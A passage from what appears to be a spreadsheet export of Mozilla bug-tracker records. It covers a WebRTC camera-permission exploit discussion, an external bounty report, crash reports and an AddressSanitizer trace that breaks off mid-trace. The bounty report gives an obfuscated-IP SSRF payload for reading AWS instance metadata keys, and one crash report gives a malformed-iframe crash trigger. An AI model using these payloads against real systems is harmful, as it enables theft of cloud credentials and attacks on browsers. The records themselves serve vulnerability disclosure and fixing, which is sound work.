A web-equivalent exploit would be a site or iframe (banner ad) navigating to an attacker-created room on a well-known already-trusted WebRTC site, using a deep link. In Firefox, "already-trusted" means the user has previously checked `☑ Remember this decision` in the gUM prompt at the well-known WebRTC site. It's worth looking at the third party (banner ad) and first-party cases separately:
In the first-party case, the exploit merely requires the trusted WebRTC site to start the call immediately and without interaction, which [many do](https://appear.in/media-test) (but again, relies on you having used the well-known site before and having granted it persistent permission in the past).
In the third-party case, the exploit additionally requires a user-trusted WebRTC service shady enough to allow itself to be iframed (not using [CSP to prevent this](https://jan-ivar.github.io/dummy/iframe_appear_cross.html)).
The good news is Firefox:
* does not persist camera &amp; microphone permissions by default (opt in)
* does not grant gUM access to background tabs (waits for focus)
* Once feature policy lands (soon) iframes (banner ads) will be blocked from gUM access by default.
The bad news is Firefox:
* allows gUM access on pageload—doesn't gate `getUserMedia` behind a user gesture.
* feature policy hasn't landed yet.
This means that if a Firefox user has selected `☑ Remember this decision` in the gUM prompt for a well-known WebRTC site, then they are vulnerable from this exploit. Once feature policy lands, it takes care of the third-party case, leaving the first-party case.
Complications: A problem with always requiring a user gesture would be that in the Firefox permission model, it leaves Firefox users with two clicks instead of one to enter a room, compared with Chrome. For example: Today, you click on a link a friend sent you over DM, you see a Firefox permission prompt asking for camera &amp; mic permission for the well-known WebRTC site, you click "Allow", and you're in. Requiring a user gesture would mean a second (in-content) click to enter. Maybe we only require it if permission is persisted?</t>
        </is>
      </c>
      <c r="X2584" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2585">
      <c r="A2585" t="n">
        <v>1550366</v>
      </c>
      <c r="B2585" t="inlineStr">
        <is>
          <t>2019-05-08 19:28:44 -0700</t>
        </is>
      </c>
      <c r="C2585" t="inlineStr">
        <is>
          <t>AWS SSRF to Pull AWS Metadata and Keys on - https://wpt.stage.mozaws.net/</t>
        </is>
      </c>
      <c r="D2585" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:14 -0700</t>
        </is>
      </c>
      <c r="E2585" t="n">
        <v>1</v>
      </c>
      <c r="F2585" t="n">
        <v>1</v>
      </c>
      <c r="G2585" t="n">
        <v>2</v>
      </c>
      <c r="H2585" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2585" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J2585" t="inlineStr">
        <is>
          <t>QA: Test Automation</t>
        </is>
      </c>
      <c r="K2585" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2585" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2585" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2585" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2585" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2585" t="inlineStr">
        <is>
          <t>[reporter-external] [web-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q2585" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2585" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2585" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2585" t="n">
        <v>0</v>
      </c>
      <c r="U2585" t="n">
        <v>0</v>
      </c>
      <c r="V2585" t="n">
        <v>26</v>
      </c>
      <c r="W2585" t="inlineStr">
        <is>
          <t>Hello. 
You can access this domain through Github SSO at - https://wpt.stage.mozaws.net/
Within the Enter a Website URL Form submit the domain http://0251.00376.000251.0000376/latest/meta-data/public-keys/0/openssh-key the regular aws meta data URL is blocked.
Observe the attached screenshot where the keys are pulled from the webservice.
Regards,
Griffin.</t>
        </is>
      </c>
      <c r="X2585" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2586">
      <c r="A2586" t="n">
        <v>1467545</v>
      </c>
      <c r="B2586" t="inlineStr">
        <is>
          <t>2018-06-07 11:43:03 -0700</t>
        </is>
      </c>
      <c r="C2586" t="inlineStr">
        <is>
          <t>Add an in-app warning when trying to use Treeherder with ESR52</t>
        </is>
      </c>
      <c r="D2586" t="inlineStr">
        <is>
          <t>2018-06-11 16:32:27 -0700</t>
        </is>
      </c>
      <c r="E2586" t="n">
        <v>1</v>
      </c>
      <c r="F2586" t="n">
        <v>1</v>
      </c>
      <c r="G2586" t="n">
        <v>7</v>
      </c>
      <c r="H2586" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2586" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2586" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K2586" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2586" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2586" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2586" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2586" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2586" t="inlineStr"/>
      <c r="Q2586" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2586" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2586" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2586" t="n">
        <v>1</v>
      </c>
      <c r="U2586" t="n">
        <v>0</v>
      </c>
      <c r="V2586" t="n">
        <v>4</v>
      </c>
      <c r="W2586" t="inlineStr">
        <is>
          <t>Treeherder doesn't work well in ESR52 since it's too old to support the revisions to the fetch API amongst other things (see bug 1465358 comment 3 for what it's missing) - and we've wontfixed supporting it.
To prevent users wasting time trying to work out why it's not working / filing bugs / us having to reply to the bugs, let's just add a warning.</t>
        </is>
      </c>
      <c r="X2586" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2587">
      <c r="A2587" t="n">
        <v>635977</v>
      </c>
      <c r="B2587" t="inlineStr">
        <is>
          <t>2011-02-22 13:08:04 -0800</t>
        </is>
      </c>
      <c r="C2587" t="inlineStr">
        <is>
          <t>crash with bad iframe source</t>
        </is>
      </c>
      <c r="D2587" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:51 -0700</t>
        </is>
      </c>
      <c r="E2587" t="n">
        <v>1</v>
      </c>
      <c r="F2587" t="n">
        <v>1</v>
      </c>
      <c r="G2587" t="n">
        <v>3</v>
      </c>
      <c r="H2587" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2587" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2587" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2587" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2587" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2587" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2587" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2587" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2587" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q2587" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2587" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2587" t="inlineStr">
        <is>
          <t>mozilla2.0</t>
        </is>
      </c>
      <c r="T2587" t="n">
        <v>1</v>
      </c>
      <c r="U2587" t="n">
        <v>0</v>
      </c>
      <c r="V2587" t="n">
        <v>23</v>
      </c>
      <c r="W2587" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0b11) Gecko/20100101 Firefox/4.0b11
Build Identifier: 4.0b11
Firefox 4.0b11 crashes in libxul with a segfault on a bad and possibly controllable read when given an iframe with source address ";%80".
Reproducible: Always
Steps to Reproduce:
1. echo '&lt;iframe src=";%80"&gt;' &gt; page.html
2. ...
3. firefox page.html
Actual Results:  
Firefox is sorry it followed a bad pointer.
Expected Results:  
Firefox should only follow good pointers.
The above minimal case crashes with:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xeffffb70 (LWP 31736)]
0xf71dafaf in ?? () from ./libxul.so
=&gt; 0xf71dafaf:	mov    (%edx,%eax,4),%edi
with eax = -1, edx = 0
Different files causing this seem to have edx=0, but eax as different values like -256975184, which make this look less like a harmless null deref. Filing conservatively as a security issue.</t>
        </is>
      </c>
      <c r="X2587" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2588">
      <c r="A2588" t="n">
        <v>68498</v>
      </c>
      <c r="B2588" t="inlineStr">
        <is>
          <t>2001-02-11 08:36:55 -0800</t>
        </is>
      </c>
      <c r="C2588" t="inlineStr">
        <is>
          <t>site segfaults Mozilla</t>
        </is>
      </c>
      <c r="D2588" t="inlineStr">
        <is>
          <t>2011-08-05 22:27:46 -0700</t>
        </is>
      </c>
      <c r="E2588" t="n">
        <v>1</v>
      </c>
      <c r="F2588" t="n">
        <v>1</v>
      </c>
      <c r="G2588" t="n">
        <v>3</v>
      </c>
      <c r="H2588" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2588" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2588" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2588" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2588" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2588" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2588" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2588" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2588" t="inlineStr"/>
      <c r="Q2588" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2588" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2588" t="inlineStr">
        <is>
          <t>mozilla0.8</t>
        </is>
      </c>
      <c r="T2588" t="n">
        <v>1</v>
      </c>
      <c r="U2588" t="n">
        <v>0</v>
      </c>
      <c r="V2588" t="n">
        <v>33</v>
      </c>
      <c r="W2588" t="inlineStr">
        <is>
          <t>build used:
  Mozilla/5.0 (X11; U; Linux 2.2.18 i686; en-US; 0.8) Gecko/20010210
browsing to:
  http://derstandard.at
results in:
[...]
JavaScript strict warning: 
http://derstandard.at/dyn/frames/clientapp_mac_ie.js line 10: function eval
must be called directly, and not by way of a function of another name.
JavaScript strict warning: 
http://derstandard.at/dyn/frames/clientapp_mac_ie.js line 10: function eval
must be called directly, and not by way of a function of another name.
/somewhere/mozilla/run-mozilla.sh: line 72:  1110 Segmentation fault
$prog ${1+"$@"}
crash also seen with yesterdays build
used to work ok with jan builds in jan
since derstandard.at is quite dynamic, crash may not always be reproduceable</t>
        </is>
      </c>
      <c r="X2588" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2589">
      <c r="A2589" t="n">
        <v>1321740</v>
      </c>
      <c r="B2589" t="inlineStr">
        <is>
          <t>2016-12-01 20:45:48 -0800</t>
        </is>
      </c>
      <c r="C2589" t="inlineStr">
        <is>
          <t>First sync after reauthenticating resets all engines and does a full sync</t>
        </is>
      </c>
      <c r="D2589" t="inlineStr">
        <is>
          <t>2017-03-02 05:05:38 -0800</t>
        </is>
      </c>
      <c r="E2589" t="n">
        <v>1</v>
      </c>
      <c r="F2589" t="n">
        <v>1</v>
      </c>
      <c r="G2589" t="n">
        <v>2</v>
      </c>
      <c r="H2589" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2589" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2589" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K2589" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2589" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2589" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2589" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2589" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2589" t="inlineStr"/>
      <c r="Q2589" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2589" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2589" t="inlineStr">
        <is>
          <t>Firefox 54</t>
        </is>
      </c>
      <c r="T2589" t="n">
        <v>1</v>
      </c>
      <c r="U2589" t="n">
        <v>0</v>
      </c>
      <c r="V2589" t="n">
        <v>18</v>
      </c>
      <c r="W2589" t="inlineStr">
        <is>
          <t>STR:
* delete the chrome://FxAccounts saved login.
* restart the browser.
* wait for you to be prompted to re-sign in to sync
* re-sign in
* note that a full sync starts (you probably need to check the logs to confirm this)
I'm fairly sure the problem is https://dxr.mozilla.org/mozilla-central/rev/9b8bf5feb0b52aa4b03aa5fa3d4f0727b2974663/services/sync/modules/browserid_identity.js#271, which causes us to hit https://dxr.mozilla.org/mozilla-central/rev/9b8bf5feb0b52aa4b03aa5fa3d4f0727b2974663/services/sync/modules/stages/enginesync.js#106 - which means this has existed forever. However, I think it's still somewhat bad as a full sync is more likely to be interrupted and do bad things.
I think the solution is at https://dxr.mozilla.org/mozilla-central/rev/9b8bf5feb0b52aa4b03aa5fa3d4f0727b2974663/services/sync/modules/browserid_identity.js#320 - instead of always passing |true|, we should see if Sync is already configured. However, part of that block we want to skip sends a "weave:service:setup-complete" notification, which displays a popup that Sync is now syncing - which we probably *do* want - but I think that can be solved by having that observe() method have a .then() which sends the notification.
OTOH though, it's not clear why we need to set that pref even for the really-first-sync case - the client *should* already be reset (as signing out of sync resets it)
Richard, can you think of a good reason to write that pref?</t>
        </is>
      </c>
      <c r="X2589" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2590">
      <c r="A2590" t="n">
        <v>910813</v>
      </c>
      <c r="B2590" t="inlineStr">
        <is>
          <t>2013-08-29 11:28:40 -0700</t>
        </is>
      </c>
      <c r="C2590" t="inlineStr">
        <is>
          <t>Crash [@ mozilla::widget::AudioSession::StopInternal() ] unplugging USB headset</t>
        </is>
      </c>
      <c r="D2590" t="inlineStr">
        <is>
          <t>2017-02-10 08:00:25 -0800</t>
        </is>
      </c>
      <c r="E2590" t="n">
        <v>1</v>
      </c>
      <c r="F2590" t="n">
        <v>1</v>
      </c>
      <c r="G2590" t="n">
        <v>3</v>
      </c>
      <c r="H2590" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2590" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2590" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K2590" t="inlineStr">
        <is>
          <t>22 Branch</t>
        </is>
      </c>
      <c r="L2590" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2590" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2590" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2590" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2590" t="inlineStr"/>
      <c r="Q2590" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2590" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2590" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2590" t="n">
        <v>1</v>
      </c>
      <c r="U2590" t="n">
        <v>0</v>
      </c>
      <c r="V2590" t="n">
        <v>8</v>
      </c>
      <c r="W2590" t="inlineStr">
        <is>
          <t>I unplugged my USB headset and Firefox crashed:
 	00000000()	
&gt;	moz6E67.tmp!mozilla::widget::AudioSession::StopInternal()  Line 301	C++
 	moz6E67.tmp!mozilla::widget::AudioSession::OnSessionDisconnectedInternal()  Line 428	C++
 	moz6E67.tmp!nsRunnableMethodImpl&lt;void (__thiscall nsRefreshDriver::*)(void),1&gt;::Run()  Line 358	C++
 	moz6E67.tmp!nsThread::ProcessNextEvent(bool mayWait=true, bool * result=0x002af08f)  Line 628	C++
 	moz6E67.tmp!NS_ProcessNextEvent(nsIThread * thread=0x010182e0, bool mayWait=true)  Line 238 + 0x1f bytes	C++
 	moz6E67.tmp!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate * aDelegate=0x000410e0)  Line 116 + 0xa bytes	C++
 	moz6E67.tmp!MessageLoop::RunHandler()  Line 214	C++
 	moz6E67.tmp!MessageLoop::Run()  Line 188	C++
 	moz6E67.tmp!nsBaseAppShell::Run()  Line 163	C++
 	moz6E67.tmp!nsAppShell::Run()  Line 112 + 0x8 bytes	C++
 	moz6E67.tmp!nsAppStartup::Run()  Line 270	C++
 	moz6E67.tmp!XREMain::XRE_mainRun()  Line 3871 + 0xa bytes	C++
 	moz6E67.tmp!XREMain::XRE_main(int argc=0x00000001, char * * argv=0x01ea1f30, const nsXREAppData * aAppData=0x002af39c)  Line 3939 + 0x6 bytes	C++
 	moz6E67.tmp!XRE_main(int argc=0x00000001, char * * argv=0x01ea1f30, const nsXREAppData * aAppData=0x002af39c, unsigned int aFlags=0x00000000)  Line 4152 + 0xd bytes	C++
 	moz6E85.tmp!do_main(int argc=0x00000001, char * * argv=0x00000000, nsIFile * xreDirectory=0x02018100)  Line 275 + 0x19 bytes	C++
 	moz6E85.tmp!NS_internal_main(int argc=0x00000001, char * * argv=0x01ea1f30)  Line 635 + 0xd bytes	C++
 	moz6E85.tmp!wmain(int argc=0x00000000, wchar_t * * argv=0x01ea1b20)  Line 112	C++
 	moz6E85.tmp!__tmainCRTStartup()  Line 552 + 0x17 bytes	C
 	kernel32.dll!@BaseThreadInitThunk@12()  + 0x12 bytes	
 	ntdll.dll!___RtlUserThreadStart@8()  + 0x27 bytes	
 	ntdll.dll!__RtlUserThreadStart@8()  + 0x1b bytes	
Looks like it had a NULL this in the top frame. Refcounting issue?</t>
        </is>
      </c>
      <c r="X2590" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2591">
      <c r="A2591" t="n">
        <v>778428</v>
      </c>
      <c r="B2591" t="inlineStr">
        <is>
          <t>2012-07-28 08:07:53 -0700</t>
        </is>
      </c>
      <c r="C2591" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsHTMLEditor::CollapseAdjacentTextNodes</t>
        </is>
      </c>
      <c r="D2591" t="inlineStr">
        <is>
          <t>2024-05-29 16:03:10 -0700</t>
        </is>
      </c>
      <c r="E2591" t="n">
        <v>1</v>
      </c>
      <c r="F2591" t="n">
        <v>1</v>
      </c>
      <c r="G2591" t="n">
        <v>3</v>
      </c>
      <c r="H2591" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2591" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2591" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K2591" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2591" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2591" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2591" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2591" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2591" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q2591" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2591" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2591" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T2591" t="n">
        <v>1</v>
      </c>
      <c r="U2591" t="n">
        <v>0</v>
      </c>
      <c r="V2591" t="n">
        <v>20</v>
      </c>
      <c r="W2591" t="inlineStr">
        <is>
          <t>Created attachment 646852
Testcase
Reproduces on trunk
20120728051930
http://hg.mozilla.org/mozilla-central/rev/08428deb1e89
=================================================================
==12811== ERROR: AddressSanitizer heap-use-after-free on address 0x7f81c5127cf0 at pc 0x7f81e8acb7f9 bp 0x7fff2669f0d0 sp 0x7fff2669f0c8
READ of size 8 at 0x7f81c5127cf0 thread T0
    #0 0x7f81e8acb7f9 in nsHTMLEditor::CollapseAdjacentTextNodes(nsIDOMRange*) src/editor/libeditor/html/nsHTMLEditor.cpp:3810
    #1 0x7f81e8b5aa3e in nsHTMLEditRules::AfterEditInner(nsEditor::OperationID, short) src/editor/libeditor/html/nsHTMLEditRules.cpp:451
    #2 0x7f81e8b587f1 in nsHTMLEditRules::AfterEdit(nsEditor::OperationID, short) src/editor/libeditor/html/nsHTMLEditRules.cpp:376
    #3 0x7f81e8ac34c5 in nsHTMLEditor::EndOperation() src/editor/libeditor/html/nsHTMLEditor.cpp:3505
    #4 0x7f81e84e6554 in ~nsAutoRules src/editor/libeditor/base/nsEditorUtils.h:95
    #5 0x7f81e84c4373 in ~nsAutoRules src/editor/libeditor/base/nsEditorUtils.h:97
    #6 0x7f81e8a99cb7 in nsHTMLEditor::Indent(nsAString_internal const&amp;) src/editor/libeditor/html/nsHTMLEditor.cpp:2229
    #7 0x7f81e8a9b01f in non-virtual thunk to nsHTMLEditor::Indent(nsAString_internal const&amp;) asn1cmn.c:0
    #8 0x7f81ec071575 in nsOutdentCommand::DoCommand(char const*, nsISupports*) src/editor/composer/src/nsComposerCommands.cpp:519
    #9 0x7f81eb8fbf9d in nsControllerCommandTable::DoCommand(char const*, nsISupports*) src/embedding/components/commandhandler/src/nsControllerCommandTable.cpp:158
    #10 0x7f81eb8ce894 in nsBaseCommandController::DoCommand(char const*) src/embedding/components/commandhandler/src/nsBaseCommandController.cpp:137
    #11 0x7f81eb8e6ce1 in nsCommandManager::DoCommand(char const*, nsICommandParams*, nsIDOMWindow*) src/embedding/components/commandhandler/src/nsCommandManager.cpp:238
    #12 0x7f81e6e54cea in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) src/content/html/document/src/nsHTMLDocument.cpp:3201
    #13 0x7f81e6e5765e in non-virtual thunk to nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, bool*) asn1cmn.c:0
    #14 0x7f81eee55fcb in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #15 0x7f81ea44923b in CallMethodHelper::Call() src/js/xpconnect/src/XPCWrappedNative.cpp:2416
    #16 0x7f81ea4b05c4 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1474
    #17 0x7f81f5ae9677 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) src/js/src/jscntxtinlines.h:387
    #18 0x7f81f5a5dbe8 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2405
    #19 0x7f81f59def35 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) src/js/src/jsinterp.cpp:302
    #20 0x7f81f5ae9a99 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:356
    #21 0x7f81f540ff50 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) src/js/src/jsinterp.h:119
    #22 0x7f81f5aeebfd in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:388
    #23 0x7f81f52b5bb9 in JS_CallFunctionValue src/js/src/jsapi.cpp:5698
    #24 0x7f81ea3f860e in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJSClass.cpp:1436
    #25 0x7f81ea39e508 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJS.cpp:580
    #26 0x7f81eee5b7d0 in PrepareAndDispatch src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:121
    #27 0x7f81eee58f67 in SharedStub src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #28 0x7f81e6256563 in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsIDOMEventTarget*, unsigned int, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:794
    #29 0x7f81e6257a2a in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) src/content/events/src/nsEventListenerManager.cpp:867
    #30 0x7f81e63e6f77 in nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) src/content/events/src/nsEventListenerManager.h:144
    #31 0x7f81e63d5c16 in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, unsigned int, bool, nsCxPusher*) src/content/events/src/nsEventDispatcher.cpp:184
    #32 0x7f81e63d377c in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned int, nsDispatchingCallback*, bool, nsCxPusher*) src/content/events/src/nsEventDispatcher.cpp:312
    #33 0x7f81e63d9290 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;nsIDOMEventTarget&gt;*) src/content/events/src/nsEventDispatcher.cpp:633
    #34 0x7f81e63dd824 in nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) src/content/events/src/nsEventDispatcher.cpp:696
    #35 0x7f81e57a21b3 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) src/content/base/src/nsINode.cpp:1079
    #36 0x7f81e52e4972 in nsContentUtils::DispatchEvent(nsIDocument*, nsISupports*, nsAString_internal const&amp;, bool, bool, bool, bool*) src/content/base/src/nsContentUtils.cpp:3428
    #37 0x7f81e52e3e06 in nsContentUtils::DispatchTrustedEvent(nsIDocument*, nsISupports*, nsAString_internal const&amp;, bool, bool, bool*) src/content/base/src/nsContentUtils.cpp:3398
    #38 0x7f81e54eca26 in nsDocument::DispatchContentLoadedEvents() src/content/base/src/nsDocument.cpp:4131
    #39 0x7f81e55ad459 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() src/../../../dist/include/nsThreadUtils.h:349
    #40 0x7f81eed56e0d in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:625
    #41 0x7f81ee9e595d in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #42 0x7f81ed97f886 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #43 0x7f81ef00a76a in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:209
    #44 0x7f81ef00a5b3 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:202
    #45 0x7f81ef00a498 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:176
    #46 0x7f81ece8568e in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #47 0x7f81ebad3448 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:271
    #48 0x7f81e2210820 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3798
    #49 0x7f81e22171c2 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3875
    #50 0x7f81e221a692 in XRE_main src/toolkit/xre/nsAppRunner.cpp:3951
    #51 0x40c28f in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #52 0x409cbd in main src/browser/app/nsBrowserApp.cpp:312
    #53 0x7f81ff037c4d in ?? ??:0
0x7f81c5127cf0 is located 112 bytes inside of 120-byte region [0x7f81c5127c80,0x7f81c5127cf8)
freed by thread T0 here:
    #0 0x4a4392 in free ??:0
    #1 0x7f81fbec35c3 in moz_free src/memory/mozalloc/mozalloc.cpp:49
    #2 0x7f81e5971366 in ~nsTextNode src/content/base/src/nsTextNode.cpp:121
    #3 0x7f81e584274d in nsNodeUtils::LastRelease(nsINode*) src/content/base/src/nsNodeUtils.cpp:252
    #4 0x7f81e56a878f in nsGenericDOMDataNode::Release() src/content/base/src/nsGenericDOMDataNode.cpp:113
    #5 0x7f81e5971794 in nsTextNode::Release() src/content/base/src/nsTextNode.cpp:124
    #6 0x7f81e21da640 in ~nsCOMPtr_base src/../../dist/include/nsCOMPtr.h:408
    #7 0x7f81e37264b6 in nsCOMPtr&lt;nsIContent&gt;::~nsCOMPtr() src/../../dist/include/nsCOMPtr.h:447
